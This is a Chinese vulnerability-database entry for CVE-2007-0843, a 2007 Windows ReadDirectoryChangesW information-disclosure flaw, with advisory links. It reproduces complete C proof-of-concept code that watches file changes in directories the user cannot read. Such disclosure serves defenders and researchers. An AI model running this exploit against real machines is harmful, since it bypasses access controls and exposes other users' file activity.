Microsoft ReadDirectoryChangesW 信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112284 漏洞类型 权限许可和访问控制
发布时间 2007-02-22 更新时间 2007-02-22
CVE编号 CVE-2007-0843 CNNVD-ID CNNVD-200702-435
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/29630
https://www.securityfocus.com/bid/22664
https://cxsecurity.com/issue/WLB-2007020085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-435
|漏洞详情
MicrosoftWindows2000,XP,Server2003和Vista上的ReadDirectoryChangesWAPI函数没有检验子对象的授权,这使得本地用户可以通过打开一个含有LIST(READ)访问的目录并使用ReadDirectoryChangesW来监控非LIST授权文件的更改,从而绕过授权。攻击者可以通过它获取文件名、访问时间和其他敏感信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/22664/info

Microsoft Windows is prone to a local information-disclosure vulnerability.

A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer. 

/*
	Monitors directory changes
	(c) 2006-2007 Vladimir Dubrovin, 3APA3A
	http://securityvulns.com/
	http://securityvulns.ru/
*/

#include <windows.h>
#include <stdio.h>
#include <string.h>


int main(int argc, char *argv[]){
    HANDLE hDir;

	char buf[1024];
	FILE_NOTIFY_INFORMATION * fn;
	int read;
	WCHAR * action = NULL;

	if(argc != 2) {
		printf(
"Usage: %s <directory_path>\n"
" Monitor directory changes with all subdirectories\n"
" For any files, including ones you have no access\n"
" (as on January, 2007)\n"
"(c) Vladimir Dubrovin, 3APA3A\n"
" http://securityvulns.com\n"
" http://securityvulns.ru\n"
"This approach is not reliable and should not be used for audit and another critical operations.\n",
 argv[0]);
		return 1;
	}

	CreateDirectory(argv[1], 0);
	hDir = CreateFile(
	  argv[1],
	  FILE_LIST_DIRECTORY,
	  FILE_SHARE_READ|FILE_SHARE_DELETE,
	  NULL,
	  OPEN_EXISTING,
	  FILE_FLAG_BACKUP_SEMANTICS,
	  NULL
	);
	if(hDir == INVALID_HANDLE_VALUE){
		fprintf(stdout, "Failed to open dir\n");
		return 2;
	}
	for(;;){
	    if(!ReadDirectoryChangesW(
		hDir,
		buf,
		1022,
		1,
		FILE_NOTIFY_CHANGE_DIR_NAME | FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_LAST_ACCESS |
			FILE_NOTIFY_CHANGE_ATTRIBUTES | FILE_NOTIFY_CHANGE_SIZE	| FILE_NOTIFY_CHANGE_LAST_WRITE	|
			FILE_NOTIFY_CHANGE_CREATION	 | FILE_NOTIFY_CHANGE_SECURITY
		,
		(DWORD *)&read,
		NULL,
		NULL
		)) {
			fprintf(stderr, "Failed to read directory changes\n");
			break;
		}
		for (fn = (FILE_NOTIFY_INFORMATION *)buf; ;){
			fn->FileName[fn->FileNameLength/2] = 0;
			switch(fn->Action){
			case FILE_ACTION_ADDED:
				action = L"added";
				break;
			case FILE_ACTION_REMOVED:
				action = L"removed";
				break;
			case FILE_ACTION_MODIFIED:
				action = L"accessed/modified";
				break;
			case FILE_ACTION_RENAMED_OLD_NAME:
				action = L"renamed (old name)";
				break;
			case FILE_ACTION_RENAMED_NEW_NAME:
				action = L"renamed (new name)";
				break;
			default:
				action = L"(unknown)";
			}
		    wprintf(L"File %s: %s\n", action, fn->FileName);
		    if(!fn->NextEntryOffset) break;
		    fn = (FILE_NOTIFY_INFORMATION *)(((char *)fn) + fn->NextEntryOffset);
		}
	}
	return 0;
	
}
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Wind
|参考资料

来源:XF
名称:win-readdirectory-information-disclosure(32644)
链接:http://xforce.iss.net/xforce/xfdb/32644
来源:BID
名称:22664
链接:http://www.securityfocus.com/bid/22664
来源:BUGTRAQ
名称:20070222MicrosoftWindows2000/XP/2003/VistaReadDirectoryChangesWinformatonleak
链接:http://www.securityfocus.com/archive/1/archive/1/460899/100/0/threaded
来源:BUGTRAQ
名称:20070222Re[2]:[Full-disclosure]MicrosoftWindows2000/XP/2003/VistaReadDirectoryChangesWinformatonleak
链接:http://www.securityfocus.com/archive/1/archive/1/460887/100/0/threaded
来源:VUPEN
名称:ADV-2007-0701
链接:http://www.frsirt.com/english/advisories/2007/0701
来源:MISC
链接:http://securityvulns.com/advisories/readdirectorychanges.asp
来源:SREASON
名称:2282
链接:http://securityreason.com/securityalert/2282
来源:SECUNIA
名称:24245
链接:http://secunia.com/advisories/24245
来源:OSVDB
名称:33474
链接:http://osvdb.org/33474
来源:FULLDISC
名称:20070222MicrosoftWindows2000/XP/2003/VistaReadDirectoryChangesWinformatonleak
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052